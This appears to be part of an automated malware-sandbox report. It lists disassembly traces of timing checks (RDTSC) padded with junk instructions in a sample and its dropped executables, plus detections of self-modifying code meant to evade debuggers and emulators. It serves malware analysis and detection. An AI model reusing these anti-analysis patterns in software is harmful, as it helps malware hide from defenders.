Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D1083A second address: 4D10908 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b push eax 0x0000000c call 00007FFB38B62E46h 0x00000011 mov edi, edi 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FFB34C126BEh 0x0000001a sbb eax, 0F874D48h 0x00000020 jmp 00007FFB34C126BBh 0x00000025 popfd 0x00000026 mov si, 4CBFh 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c pushad 0x0000002d jmp 00007FFB34C126C0h 0x00000032 pushfd 0x00000033 jmp 00007FFB34C126C2h 0x00000038 add ecx, 5C3DB2D8h 0x0000003e jmp 00007FFB34C126BBh 0x00000043 popfd 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 pushfd 0x0000004a jmp 00007FFB34C126C2h 0x0000004f jmp 00007FFB34C126C5h 0x00000054 popfd 0x00000055 pushfd 0x00000056 jmp 00007FFB34C126C0h 0x0000005b add si, F798h 0x00000060 jmp 00007FFB34C126BBh 0x00000065 popfd 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC001F second address: 4CC002E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC002E second address: 4CC0034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0034 second address: 4CC004C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC004C second address: 4CC005E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC005E second address: 4CC0064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0064 second address: 4CC0072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0072 second address: 4CC0110 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FFB34E3B6CBh 0x00000008 add ax, 17DEh 0x0000000d jmp 00007FFB34E3B6D9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 mov dx, si 0x00000019 pushfd 0x0000001a jmp 00007FFB34E3B6CAh 0x0000001f xor si, 5FD8h 0x00000024 jmp 00007FFB34E3B6CBh 0x00000029 popfd 0x0000002a popad 0x0000002b popad 0x0000002c mov ebp, esp 0x0000002e jmp 00007FFB34E3B6D6h 0x00000033 and esp, FFFFFFF8h 0x00000036 jmp 00007FFB34E3B6D0h 0x0000003b xchg eax, ecx 0x0000003c jmp 00007FFB34E3B6D0h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FFB34E3B6CEh 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0110 second address: 4CC0130 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FFB34C126BBh 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0130 second address: 4CC0136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0136 second address: 4CC0154 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ch, bh 0x00000011 mov esi, 292710A5h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0154 second address: 4CC01AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx edx, cx 0x0000000e popad 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FFB34E3B6D3h 0x00000017 jmp 00007FFB34E3B6D3h 0x0000001c popfd 0x0000001d mov ebx, esi 0x0000001f popad 0x00000020 mov ebx, dword ptr [ebp+10h] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FFB34E3B6D1h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC01AC second address: 4CC01D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFB34C126BDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC01D1 second address: 4CC01ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC01ED second address: 4CC01F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC01F1 second address: 4CC01F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC01F5 second address: 4CC01FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC01FB second address: 4CC0201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0201 second address: 4CC0210 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0210 second address: 4CC0221 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB34E3B6CDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0221 second address: 4CC0225 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0225 second address: 4CC0233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0233 second address: 4CC0246 instructions: 0x00000000 rdtsc 0x00000002 mov edx, 20A5B6C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dh, 77h 0x0000000b popad 0x0000000c xchg eax, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0246 second address: 4CC024A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC024A second address: 4CC0250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0250 second address: 4CC0267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB34E3B6D3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0267 second address: 4CC02B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FFB34C126C4h 0x0000000e xchg eax, edi 0x0000000f pushad 0x00000010 movzx ecx, dx 0x00000013 jmp 00007FFB34C126C3h 0x00000018 popad 0x00000019 test esi, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FFB34C126C5h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC02B6 second address: 4CC02C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB34E3B6CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC02C6 second address: 4CC02EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FFBA6E809F4h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007FFB34C126BBh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC02EC second address: 4CC0303 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFB34E3B6D2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0303 second address: 4CC0342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000e pushad 0x0000000f mov eax, 1DBF0833h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushfd 0x00000017 jmp 00007FFB34C126C6h 0x0000001c adc eax, 157DD038h 0x00000022 jmp 00007FFB34C126BBh 0x00000027 popfd 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0342 second address: 4CC039F instructions: 0x00000000 rdtsc 0x00000002 mov esi, 364AE66Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a je 00007FFBA70A99A5h 0x00000010 jmp 00007FFB34E3B6D2h 0x00000015 mov edx, dword ptr [esi+44h] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FFB34E3B6CDh 0x00000021 and cl, FFFFFF86h 0x00000024 jmp 00007FFB34E3B6D1h 0x00000029 popfd 0x0000002a call 00007FFB34E3B6D0h 0x0000002f pop eax 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC039F second address: 4CC03CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFB34C126C7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC03CF second address: 4CC0417 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 movsx edx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edx, 61000000h 0x00000011 pushad 0x00000012 pushad 0x00000013 push esi 0x00000014 pop edi 0x00000015 push esi 0x00000016 pop edx 0x00000017 popad 0x00000018 mov ebx, esi 0x0000001a popad 0x0000001b jne 00007FFBA70A9964h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 movsx ebx, si 0x00000027 pushfd 0x00000028 jmp 00007FFB34E3B6CEh 0x0000002d sub cx, 3348h 0x00000032 jmp 00007FFB34E3B6CBh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0417 second address: 4CC042F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB34C126C4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC042F second address: 4CC0433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0433 second address: 4CC0495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [esi+48h], 00000001h 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FFB34C126BDh 0x00000013 and eax, 29303716h 0x00000019 jmp 00007FFB34C126C1h 0x0000001e popfd 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FFB34C126BEh 0x00000026 sbb cx, E338h 0x0000002b jmp 00007FFB34C126BBh 0x00000030 popfd 0x00000031 popad 0x00000032 popad 0x00000033 jne 00007FFBA6E808CEh 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0495 second address: 4CC049B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB081C second address: 4CB0822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0822 second address: 4CB084A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edx, 5D89DC2Ch 0x00000011 call 00007FFB34E3B6D5h 0x00000016 pop esi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB084A second address: 4CB08CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov ebx, ecx 0x0000000f mov bx, ax 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 jmp 00007FFB34C126C4h 0x0000001a and esp, FFFFFFF8h 0x0000001d pushad 0x0000001e call 00007FFB34C126BEh 0x00000023 call 00007FFB34C126C2h 0x00000028 pop ecx 0x00000029 pop edx 0x0000002a pushfd 0x0000002b jmp 00007FFB34C126C0h 0x00000030 xor eax, 6EEAC568h 0x00000036 jmp 00007FFB34C126BBh 0x0000003b popfd 0x0000003c popad 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB08CD second address: 4CB08D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB08D1 second address: 4CB08D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB08D5 second address: 4CB08DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB08DB second address: 4CB099C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FFB34C126C1h 0x00000011 sbb ecx, 44087E36h 0x00000017 jmp 00007FFB34C126C1h 0x0000001c popfd 0x0000001d jmp 00007FFB34C126C0h 0x00000022 popad 0x00000023 xchg eax, ebx 0x00000024 jmp 00007FFB34C126C0h 0x00000029 xchg eax, esi 0x0000002a pushad 0x0000002b mov ax, dx 0x0000002e popad 0x0000002f push eax 0x00000030 pushad 0x00000031 mov si, 7A1Bh 0x00000035 mov edi, ecx 0x00000037 popad 0x00000038 xchg eax, esi 0x00000039 jmp 00007FFB34C126BAh 0x0000003e mov esi, dword ptr [ebp+08h] 0x00000041 jmp 00007FFB34C126C0h 0x00000046 sub ebx, ebx 0x00000048 pushad 0x00000049 mov eax, ebx 0x0000004b call 00007FFB34C126C3h 0x00000050 movzx esi, di 0x00000053 pop ebx 0x00000054 popad 0x00000055 test esi, esi 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007FFB34C126C7h 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB099C second address: 4CB09CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FFBA70B109Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFB34E3B6CDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB09CE second address: 4CB0A23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 mov si, 1503h 0x00000015 jmp 00007FFB34C126C8h 0x0000001a popad 0x0000001b mov ecx, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FFB34C126C7h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0A23 second address: 4CB0A55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FFBA70B1029h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFB34E3B6CDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0A55 second address: 4CB0AB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [76FB6968h], 00000002h 0x00000010 jmp 00007FFB34C126BEh 0x00000015 jne 00007FFBA6E87FEDh 0x0000001b jmp 00007FFB34C126C0h 0x00000020 mov edx, dword ptr [ebp+0Ch] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FFB34C126C7h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0AB1 second address: 4CB0AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0AB7 second address: 4CB0ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0ABB second address: 4CB0AE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FFB34E3B6D0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0AE1 second address: 4CB0AE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0AE5 second address: 4CB0AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0AEB second address: 4CB0AF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0AF1 second address: 4CB0AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0AF5 second address: 4CB0B9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FFB34C126BDh 0x00000012 popad 0x00000013 xchg eax, ebx 0x00000014 jmp 00007FFB34C126BEh 0x00000019 xchg eax, ebx 0x0000001a jmp 00007FFB34C126C0h 0x0000001f push eax 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FFB34C126C1h 0x00000027 sbb eax, 562C1436h 0x0000002d jmp 00007FFB34C126C1h 0x00000032 popfd 0x00000033 call 00007FFB34C126C0h 0x00000038 push esi 0x00000039 pop edi 0x0000003a pop esi 0x0000003b popad 0x0000003c xchg eax, ebx 0x0000003d jmp 00007FFB34C126BDh 0x00000042 push dword ptr [ebp+14h] 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0B9A second address: 4CB0B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0B9E second address: 4CB0BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0BA4 second address: 4CB0BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB34E3B6D1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0C02 second address: 4CB0C18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0C18 second address: 4CB0C33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0C33 second address: 4CB0C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0C39 second address: 4CB0C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0C3D second address: 4CB0C41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0D28 second address: 4CC0D3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB34E3B6D2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0D3E second address: 4CC0D5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push edx 0x0000000c mov ch, D4h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFB34C126C0h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0D5F second address: 4CC0D98 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FFB34E3B6D2h 0x00000008 add al, FFFFFFE8h 0x0000000b jmp 00007FFB34E3B6CBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007FFB34E3B6CBh 0x0000001d push eax 0x0000001e pop edx 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0B4B second address: 4CC0B7A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 166E1871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx ecx, di 0x0000000c popad 0x0000000d push esp 0x0000000e pushad 0x0000000f mov cl, 73h 0x00000011 mov ecx, ebx 0x00000013 popad 0x00000014 mov dword ptr [esp], ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FFB34C126C6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D4070E second address: 4D40733 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFB34E3B6CDh 0x00000011 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E0EB04 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: FBFF3D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: FC0307 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: FBEE0A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 3CEB04 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 57FF3D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 580307 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 57EE0A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Special instruction interceptor: First address: B37CAA instructions caused by: Self-modifying code
